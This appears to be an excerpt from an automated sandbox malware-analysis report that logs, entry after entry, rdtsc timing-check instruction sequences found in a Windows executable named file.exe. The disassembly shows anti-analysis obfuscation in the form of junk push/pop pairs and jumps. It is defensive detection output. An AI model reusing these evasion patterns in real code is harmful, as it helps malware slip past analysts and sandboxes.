              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BF2C second address: B9BF46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79A4C9A8F1h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BF46 second address: B9BF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99E50 second address: B99E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2EFC second address: BA2F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2F00 second address: BA2F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB01B6 second address: BB01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F79A547B38Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB01D2 second address: BB01E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F79A4C9A8EEh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB01E9 second address: BB01ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB0D second address: ADBB11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB11 second address: ADBB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB17 second address: ADBB35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB46D2 second address: BB46E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B391h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB46E7 second address: BB46FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB46FE second address: BB4704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4704 second address: BB4708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4708 second address: BB470E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB40ED second address: BB40F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB40F1 second address: BB4105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B390h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4105 second address: BB4114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F79A4C9A8E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4114 second address: BB411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB411A second address: BB4120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4120 second address: BB412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB412C second address: BB4132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4132 second address: BB414B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79A547B394h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB414B second address: BB4151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB428F second address: BB4295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4295 second address: BB429D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7370 second address: BC7374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7374 second address: BC739F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F79A4C9A8F8h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD98F second address: BCD993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD993 second address: BCD9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDAF second address: BCDDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDB5 second address: BCDDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF30 second address: BCDF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF34 second address: BCDF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF3A second address: BCDF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F79A547B386h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDF44 second address: BCDF52 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE35E second address: BCE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE362 second address: BCE37B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F79A4C9A8EAh 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE37B second address: BCE382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE382 second address: BCE3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F6h 0x00000009 popad 0x0000000a jmp 00007F79A4C9A8EBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE3AF second address: BCE3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE3B5 second address: BCE3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3A62 second address: BD3A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD3769 second address: BD376F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD376F second address: BD3775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE26BE second address: BE26C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE4A4 second address: BDE4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE4AA second address: BDE4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF070B second address: BF0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B38Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d je 00007F79A547B386h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 jng 00007F79A547B38Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF089B second address: BF089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06350 second address: C06367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79A547B38Dh 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06367 second address: C063A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E6h 0x00000008 jc 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F79A4C9A8FAh 0x00000016 jmp 00007F79A4C9A8F2h 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e jnp 00007F79A4C9A8E6h 0x00000024 jmp 00007F79A4C9A8EEh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2A9 second address: C0A2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2AD second address: C0A2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2B5 second address: C0A2D8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A547B39Dh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F79A547B395h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2D8 second address: C0A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F79A4C9A8ECh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A2F0 second address: C0A2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F79A547B386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A46D second address: C0A47B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A47B second address: C0A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0AD5F second address: C0AD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0AD67 second address: C0AD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B055 second address: C0B05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B05A second address: C0B077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B393h 0x00000007 jng 00007F79A547B3A1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CBAC second address: C0CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CBB0 second address: C0CBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F79A547B38Bh 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7A3 second address: C0F7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 xor dword ptr [ebp+1247DB1Bh], eax 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F79A4C9A8E8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 adc dx, EE7Ah 0x0000002d push 6BEE4C73h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E0 second address: C0F7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E4 second address: C0F7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7E8 second address: C0F7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0F7EE second address: C0F7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11511 second address: C11517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11517 second address: C1151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1151B second address: C11532 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F79A547B38Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11532 second address: C11536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11045 second address: C11065 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F79A547B397h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11065 second address: C11070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11070 second address: C1107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2547A second address: B2547F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2547F second address: B25485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F02E6 second address: 50F02EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F02EC second address: 50F0333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C9B7h 0x00000007 mov di, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F79A547B396h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop esi 0x0000001c jmp 00007F79A547B399h 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0333 second address: 50F0339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0339 second address: 50F033D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0389 second address: 50F03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8F4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F03A1 second address: 50F03A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51203E2 second address: 5120410 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F79A4C9A8F0h 0x00000008 adc cx, 0358h 0x0000000d jmp 00007F79A4C9A8EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120410 second address: 5120414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120414 second address: 512042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512042F second address: 5120454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 call 00007F79A547B390h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120454 second address: 512048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F79A4C9A8F0h 0x0000000f push eax 0x00000010 jmp 00007F79A4C9A8EBh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512048C second address: 51204A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204A7 second address: 51204AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204AE second address: 51204DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jmp 00007F79A547B38Ch 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F79A547B397h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51204DE second address: 5120508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79A4C9A8F9h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120508 second address: 512050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512050E second address: 5120512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120512 second address: 512058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov edi, 25C0C004h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 pushad 0x00000014 mov bh, 0Bh 0x00000016 jmp 00007F79A547B392h 0x0000001b popad 0x0000001c push dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F79A547B38Dh 0x00000028 and cx, 04A6h 0x0000002d jmp 00007F79A547B391h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F79A547B390h 0x00000039 jmp 00007F79A547B395h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51205BB second address: 51205C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
